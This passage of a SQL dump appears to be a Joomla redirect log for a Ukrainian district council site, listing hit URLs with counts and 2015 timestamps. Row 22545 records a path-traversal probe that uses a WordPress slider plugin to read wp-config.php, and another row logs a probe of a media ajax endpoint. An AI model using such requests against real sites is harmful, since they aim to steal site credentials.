00:00:00',301),(22499,'http://www.malyn-rayrada.org.ua/plugins/system/jcemediabox/themes/standard/popup.html','','http://www.malyn-rayrada.org.ua/','',22,0,'2015-12-25 11:34:01','0000-00-00 00:00:00',301),(22500,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=ru','','','',4,0,'2015-12-25 12:58:24','0000-00-00 00:00:00',301),(22501,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/image?view=image&format=raw&type=orig&id=90','','','',1,0,'2015-12-25 13:48:10','0000-00-00 00:00:00',301),(22502,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=ru&id=article','','','',103,0,'2015-12-25 15:04:48','0000-00-00 00:00:00',301),(22503,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/image?view=image&format=raw&type=orig&id=85','','','',1,0,'2015-12-25 15:17:19','0000-00-00 00:00:00',301),(22504,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15','','','',54,0,'2015-12-25 16:40:32','0000-00-00 00:00:00',301),(22505,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja?catid=79&id=1285:pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2016-rotsi','','','',1,0,'2015-12-25 18:55:38','0000-00-00 00:00:00',301),(22506,'http://www.malyn-rayrada.org.ua/index.php/component/content/article?lang=uk&id=article','','','',98,0,'2015-12-25 23:00:53','0000-00-00 00:00:00',301),(22507,'http://www.malyn-rayrada.org.ua/index.php/1279-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-3-sesiyu-rajonnoji-radi-7-sklikannya','','','',22,0,'2015-12-25 23:23:09','0000-00-00 00:00:00',301),(22508,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/image?view=image&format=raw&type=orig&id=1','','','',1,0,'2015-12-25 23:39:41','0000-00-00 00:00:00',301),(22509,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27','','','',20,0,'2015-12-26 00:22:15','0000-00-00 00:00:00',301),(22510,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/365-pro-pereukladennja-kontraktiv-z-kerivnikami','','','',12,0,'2015-12-26 00:22:32','0000-00-00 00:00:00',301),(22511,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',16,0,'2015-12-26 00:30:24','0000-00-00 00:00:00',301),(22512,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/79-rishennya-vid-23-12-2015-roku/1285-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osvit','','','',1,0,'2015-12-26 00:31:31','0000-00-00 00:00:00',301),(22513,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1267-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2016-rik','','','',31,0,'2015-12-26 01:55:52','0000-00-00 00:00:00',301),(22514,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1257-pro-rajonnu-tsilovu-sotsialnu-programu-protidiji-vil-infektsiji-snidu-na-2015-2018-roki','','','',19,0,'2015-12-26 02:25:04','0000-00-00 00:00:00',301),(22515,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=2','','','',17,0,'2015-12-26 02:27:30','0000-00-00 00:00:00',301),(22516,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/image?view=image&format=raw&type=orig&id=9','','','',1,0,'2015-12-26 02:48:42','0000-00-00 00:00:00',301),(22517,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15','','','',8,0,'2015-12-26 02:58:02','0000-00-00 00:00:00',301),(22518,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1269-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',28,0,'2015-12-26 02:59:53','0000-00-00 00:00:00',301),(22519,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1255-pro-programu-rozvitku-donorstva-krovi-ta-jiji-komponentiv-u-malinskomu-rajoni-na-2015-2018-roki','','','',11,0,'2015-12-26 03:19:04','0000-00-00 00:00:00',301),(22520,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1275-pro-pogodzhennya-zvilnennya-z-posadi-direktora-rajonnogo-budinku-kulturi-vishnevskoji-o-v','','','',16,0,'2015-12-26 04:29:28','0000-00-00 00:00:00',301),(22521,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1271-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya','','','',25,0,'2015-12-26 05:28:13','0000-00-00 00:00:00',301),(22522,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/image?view=image&format=raw&type=orig&id=126','','','',1,0,'2015-12-26 05:46:48','0000-00-00 00:00:00',301),(22523,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/image?view=image&format=raw&type=orig&id=122','','','',1,0,'2015-12-26 06:02:07','0000-00-00 00:00:00',301),(22524,'http://www.malyn-rayrada.org.ua/index.php?catid=1297&id=1297:urochistosti-z-nagodi-25-richchya-pfu','','','',19,0,'2015-12-26 06:07:58','0000-00-00 00:00:00',301),(22525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=59&Itemid=107&lang=uk&limitstart=10','','','',3,0,'2015-12-26 06:12:44','0000-00-00 00:00:00',301),(22526,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?format=feed&type=atom','','','',1,0,'2015-12-26 06:32:18','0000-00-00 00:00:00',301),(22527,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1254-pro-vnesennya-zmin-do-polozhennya-pro-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu','','','',15,0,'2015-12-26 06:51:22','0000-00-00 00:00:00',301),(22528,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18/malinshchina-i-malinchani-85','','','',2,0,'2015-12-26 07:55:02','0000-00-00 00:00:00',301),(22529,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1287-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik','','https://www.google.com.ua/','',22,0,'2015-12-26 08:04:06','0000-00-00 00:00:00',301),(22530,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18','','','',42,0,'2015-12-26 08:28:25','0000-00-00 00:00:00',301),(22531,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani','','','',15,0,'2015-12-26 08:40:56','0000-00-00 00:00:00',301),(22532,'http://www.malyn-rayrada.org.ua/index.php?id=54&Itemid=95&lang=uk&layout=blog&option=com_content&view=category','','','',26,0,'2015-12-26 09:16:14','0000-00-00 00:00:00',301),(22533,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu/image?view=image&format=raw&type=orig&id=9','','','',1,0,'2015-12-26 09:39:06','0000-00-00 00:00:00',301),(22534,'http://www.malyn-rayrada.org.ua/index.php/component/acepolls/poll/1-chim-vam-zapam-yatavsya-2014-rik','','','',46,0,'2015-12-26 09:43:08','0000-00-00 00:00:00',301),(22535,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1283-pro-rajonnij-byudzhet-na-2016-rik','','','',21,0,'2015-12-26 10:41:20','0000-00-00 00:00:00',301),(22536,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1282-pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik','','','',13,0,'2015-12-26 10:45:03','0000-00-00 00:00:00',301),(22537,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04','','','',22,0,'2015-12-26 10:46:40','0000-00-00 00:00:00',301),(22538,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=2','','','',40,0,'2015-12-26 12:24:24','0000-00-00 00:00:00',301),(22539,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1337:2014-06-10-11-11-42&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-26 12:25:35','0000-00-00 00:00:00',301),(22540,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2015-12-26 12:27:26','0000-00-00 00:00:00',301),(22541,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',27,0,'2015-12-26 12:29:20','0000-00-00 00:00:00',301),(22542,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=20:-2009-&catid=16:2010-06-06-10-55-25&Itemid=39&lang=uk','','','',5,0,'2015-12-26 12:35:50','0000-00-00 00:00:00',301),(22543,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1263-pro-rajonnu-programu-sotsialnoji-pidtrimki-ditej-simej-ta-molodi-na-2016-2020-roki','','','',17,0,'2015-12-26 12:56:46','0000-00-00 00:00:00',301),(22544,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=272:-2010-&catid=31&Itemid=62&lang=uk','','','',1,0,'2015-12-26 13:04:00','0000-00-00 00:00:00',301),(22545,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','','','',2,0,'2015-12-26 13:35:56','0000-00-00 00:00:00',301),(22546,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=53&layout=blog&Itemid=94&lang=uk','','','',2,0,'2015-12-26 13:44:18','0000-00-00 00:00:00',301),(22547,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=uk','','','',1,0,'2015-12-26 13:55:57','0000-00-00 00:00:00',301),(22548,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/img-7477-90','','','',13,0,'2015-12-26 14:37:05','0000-00-00 00:00:00',301),(22549,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/fapu-135','','','',6,0,'2015-12-26 14:37:07','0000-00-00 00:00:00',301),(22550,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=1','','','',16,0,'2015-12-26 14:37:08','0000-00-00 00:00:00',301),(22551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=774:2012-10-02-09-30-45&catid=45&Itemid=84&lang=en','','','',2,0,'2015-12-26 14:40:27','0000-00-00 00:00:00',301),(22552,'http://malyn-rayrada.org.ua/components/com_media/ajax.php','','','',1,0,'2015-12-26 15:20:38','0000-00-00 00:00:00',301),(22553,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/pochesni-gromadyani-rajonu','','','',26,0,'2015-12-26 15:21:16','0000-00-00 00:00:00',301),(22554,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-26 15:43:00','0000-00-00 00:00:00',301),(22555,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1277-pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu','','','',36,0,'2015-12-26 16:08:23','0000-00-00 00:00:00',301),(22556,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44?catid=415&id=415:kontaktna-informacija-3','','','',11,0,'2015-12-26 16:08:41','0000-00-00 00:00:00',301),(22557,'http://malyn-rayrada.org.ua/index.php/1292-pro-perenesennya-dati-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya','','','',7,0,'2015-12-26 19:22:42','0000-00-00 00:00:00',301),(22558,'http://malyn-rayrada.org.ua/index.php/1292-pro-perenesennya-dati-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-12-26 19:22:47','0000-00-00 00:00:00',301),(22559,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1259-pro-rajonnu-programu-vidpochinku-ta-ozdorovlennya-ditej-malinskogo-rajonu-na-2016-2020-roki','','','',6,0,'2015-12-26 19:23:13','0000-00-00 00:00:00',301),(22560,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1261-pro-rajonnu-programu-ozdorovlennya-teritoriji-malinskogo-rajonu-vid-skazu-na-2016-2020-roki?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-26 19:23:18','0000-00-00 00:00:00',301),(22561,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1282-pro-viznachennya-umov-oplati-pratsi-golovi-rajonnoji-radi-ta-zastupnika-golovi-rajonnoji-radi-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-26 19:23:21','0000-00-00 00:00:00',301),(22562,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1287-pro-vstanovlennya-rozmiru-vartosti-kharchuvannya-ta-batkivskoji-plati-u-doshkilnikh-navchalnikh-zakladakh-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-12-26 19:23:24','0000-00-00 00:00:00',301),(22563,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1289-pro-perelik-investitsijnikh-proektiv-shcho-mozhut-realizovuvatis-za-rakhunok-koshtiv-derzhavnogo-fondu-regionalnogo-rozvitku','','','',11,0,'2015-12-26 19:23:26','0000-00-00 00:00:00',301),(22564,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1294-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji','','','',11,0,'2015-12-26 19:23:30','0000-00-00 00:00:00',301),(22565,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1296-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',7,0,'2015-12-26 19:23:32','0000-00-00 00:00:00',301),(22566,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18?page=3','','','',16,0,'2015-12-26 21:28:17','0000-00-00 00:00:00',301),(22567,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=95:------------2006-2010--&catid=26:--11082010-&Itemid=54&lang=uk','','','',2,0,'2015-12-27 00:28:13','0000-00-00 00:00:00',301),(22568,'http://www.malyn-rayrada.org.ua/index.php/1292-pro-perenesennya-dati-sklikannya-3-sesiji-rajonnoji-radi-7-sklikannya','','','',37,0,'2015-12-27 01:14:51','0000-00-00 00:00:00',301),(22569,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/786-1-16-kubku-zhitomirskoi-oblasti','','','',11,0,'2015-12-27 04:28:32','0000-00-00 00:00:00',301),(22570,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/gamanuk1285265172-thumb-medium150-93','','','',6,0,'2015-12-27 04:36:38','0000-00-00 00:00:00',301),(22571,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-1-1','','','',8,0,'2015-12-27 04:36:41','0000-00-00 00:00:00',301),(22572,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-2-2','','','',6,0,'2015-12-27 04:36:46','0000-00-00 00:00:00',301),(22573,'http://www.malyn-rayrada.org.ua/index.php/818-informacija-pro-rezultati-konkursu-shhodo-vidboru?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 04:48:40','0000-00-00 00:00:00',301),(22574,'http://www.malyn-rayrada.org.ua/index.php/1186-q?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 04:48:41','0000-00-00 00:00:00',301),(22575,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/786-1-16-kubku-zhitomirskoi-oblasti?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 05:33:57','0000-00-00 00:00:00',301),(22576,'http://www.malyn-rayrada.org.ua/index.php/835-malinskij-rajonnij-centr-socialnih-sluzhb-dlja?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 08:50:57','0000-00-00 00:00:00',301),(22577,'http://malyn-rayrada.org.ua/index.php/422-rezultati-viboriv-v-skuratah?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 09:23:08','0000-00-00 00:00:00',301),(22578,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1270-pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik','','','',35,0,'2015-12-27 09:33:46','0000-00-00 00:00:00',301),(22579,'http://www.malyn-rayrada.org.ua/index.php/265-nadhodzhennja-dohodiv-do-bjudzhetu-zhitomirskoi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-12-27 09:34:06','0000-00-00 00:00:00',301),(22580,'http://malyn-rayrada.org.ua/index.php/1071-narada-za-uchastyu-nachalnika-oblasnogo-kaznachejstva-petra-chornogo?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-27 10:03:41','0000-00-00 00:00:00',301),(22581,'http://malyn-rayrada.org.ua/index.php/1073-15-kvitnya-blagodijnij-kontsert-v-rbk?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-12-27 10:03:44','0000-00-00 00:00:00',301),(22582,'http://malyn-rayrada.org.ua/index.php/1099-vidbulas-39-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:03:53','0000-00-00 00:00:00',301),(22583,'http://malyn-rayrada.org.ua/index.php/1132-zastupnik-keruyuchogo-nachalnik-viddilu-rozvitku-bankivskogo-biznesu-tvbv-10005-038-filiji-zhitomirskogo-oblasnogo-upravlinnya-at-oshchadbank-mikhajlenko-s-m-informue','','','',28,0,'2015-12-27 10:04:19','0000-00-00 00:00:00',301),(22584,'http://malyn-rayrada.org.ua/index.php/1156-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-pershe-pivrichchya-2015-roku','','','',6,0,'2015-12-27 10:04:30','0000-00-00 00:00:00',301),(22585,'http://malyn-rayrada.org.ua/index.php/1159-pro-sklikannya-41sesiji-rajonnoji-radi-6-sklikannya','','','',4,0,'2015-12-27 10:04:34','0000-00-00 00:00:00',301),(22586,'http://malyn-rayrada.org.ua/index.php/1172-vidbulas-41-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:04:35','0000-00-00 00:00:00',301),(22587,'http://malyn-rayrada.org.ua/index.php/1209-pishov-z-zhittya-volodimir-melnichenko?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:04:45','0000-00-00 00:00:00',301),(22588,'http://malyn-rayrada.org.ua/index.php/1279-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-3-sesiyu-rajonnoji-radi-7-sklikannya','','','',6,0,'2015-12-27 10:04:51','0000-00-00 00:00:00',301),(22589,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/2014-09-22-17-49-27','','','',7,0,'2015-12-27 10:05:31','0000-00-00 00:00:00',301),(22590,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-4-4','','','',3,0,'2015-12-27 10:05:34','0000-00-00 00:00:00',301),(22591,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/a3-130','','','',3,0,'2015-12-27 10:05:35','0000-00-00 00:00:00',301),(22592,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/zim-12-2-146','','','',7,0,'2015-12-27 10:05:37','0000-00-00 00:00:00',301),(22593,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-1127-23-115','','','',8,0,'2015-12-27 10:05:39','0000-00-00 00:00:00',301),(22594,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18','','','',5,0,'2015-12-27 10:05:41','0000-00-00 00:00:00',301),(22595,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18?page=2','','','',6,0,'2015-12-27 10:05:42','0000-00-00 00:00:00',301),(22596,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani/2014-09-22-17-50-18?page=3','','','',6,0,'2015-12-27 10:05:45','0000-00-00 00:00:00',301),(22597,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=1','','','',4,0,'2015-12-27 10:06:29','0000-00-00 00:00:00',301),(22598,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=14','','','',7,0,'2015-12-27 10:07:17','0000-00-00 00:00:00',301),(22599,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=21','','','',7,0,'2015-12-27 10:07:19','0000-00-00 00:00:00',301),(22600,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=28','','','',7,0,'2015-12-27 10:07:21','0000-00-00 00:00:00',301),(22601,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=35','','','',7,0,'2015-12-27 10:07:24','0000-00-00 00:00:00',301),(22602,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=7','','','',7,0,'2015-12-27 10:07:26','0000-00-00 00:00:00',301),(22603,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=14','','','',7,0,'2015-12-27 10:07:35','0000-00-00 00:00:00',301),(22604,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=21','','','',7,0,'2015-12-27 10:07:37','0000-00-00 00:00:00',301),(22605,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=28','','','',7,0,'2015-12-27 10:07:39','0000-00-00 00:00:00',301),(22606,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=ru&start=35','','','',7,0,'2015-12-27 10:07:42','0000-00-00 00:00:00',301),(22607,'http://malyn-rayrada.org.ua/index.php/217-zakon-pro-misceve-samovrjaduvannja-potribno','','','',4,0,'2015-12-27 10:07:59','0000-00-00 00:00:00',301),(22608,'http://malyn-rayrada.org.ua/index.php/217-zakon-pro-misceve-samovrjaduvannja-potribno?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:08:01','0000-00-00 00:00:00',301),(22609,'http://malyn-rayrada.org.ua/index.php/308-u-2011-roci-kiiv-donecka-ta-luganska-oblasti','','','',5,0,'2015-12-27 10:08:08','0000-00-00 00:00:00',301),(22610,'http://malyn-rayrada.org.ua/index.php/308-u-2011-roci-kiiv-donecka-ta-luganska-oblasti?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:08:10','0000-00-00 00:00:00',301),(22611,'http://malyn-rayrada.org.ua/index.php/386-pershi-oficijni-rezultati-viboriv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-27 10:08:15','0000-00-00 00:00:00',301),(22612,'http://malyn-rayrada.org.ua/index.php/40-vitaemo-zi-svjatom-hristovogo-voskresinnja','','','',6,0,'2015-12-27 10:08:18','0000-00-00 00:00:00',301),(22613,'http://malyn-rayrada.org.ua/index.php/559-i-u-ditej-ih-batkiv-ta-vchiteliv-bude-svjato?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-12-27 10:08:40','0000-00-00 00:00:00',301),(22614,'http://malyn-rayrada.org.ua/index.php/583-rosijska-mitnicja-z-sogodnishnogo-dnja-zupinila?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:08:52','0000-00-00 00:00:00',301),(22615,'http://malyn-rayrada.org.ua/index.php/710-vitalij-francuz-novij-golova-zhitomirskoi-oblasnoi','','','',5,0,'2015-12-27 10:08:54','0000-00-00 00:00:00',301),(22616,'http://malyn-rayrada.org.ua/index.php/710-vitalij-francuz-novij-golova-zhitomirskoi-oblasnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-12-27 10:08:56','0000-00-00 00:00:00',301),(22617,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1268-pro-deleguvannya-povnovazhen-malinskoji-rajonnoji-radi-malinskij-rajonnij-derzhavnij-administratsiji','','','',5,0,'2015-12-27 10:10:16','0000-00-00 00:00:00',301),(22618,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1269-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:10:19','0000-00-00 00:00:00',301),(22619,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1270-pro-zatverdzhennya-planu-diyalnosti-rajonnoji-radi-z-pidgotovki-proektiv-regulyatornikh-aktiv-na-2016-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:10:21','0000-00-00 00:00:00',301),(22620,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1271-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-radi-vitrat-na-jogo-utrimannya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:10:25','0000-00-00 00:00:00',301),(22621,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1277-pro-ugodu-mizh-zhitomirskoyu-oblasnoyu-radoyu-ta-malinskoyu-rajonnoyu-radoyu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:10:35','0000-00-00 00:00:00',301),(22622,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1278-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-yaka-peredaetsya-v-orendu-gr-beginu-v-m?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:11:09','0000-00-00 00:00:00',301),(22623,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/58-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-12-27 10:11:25','0000-00-00 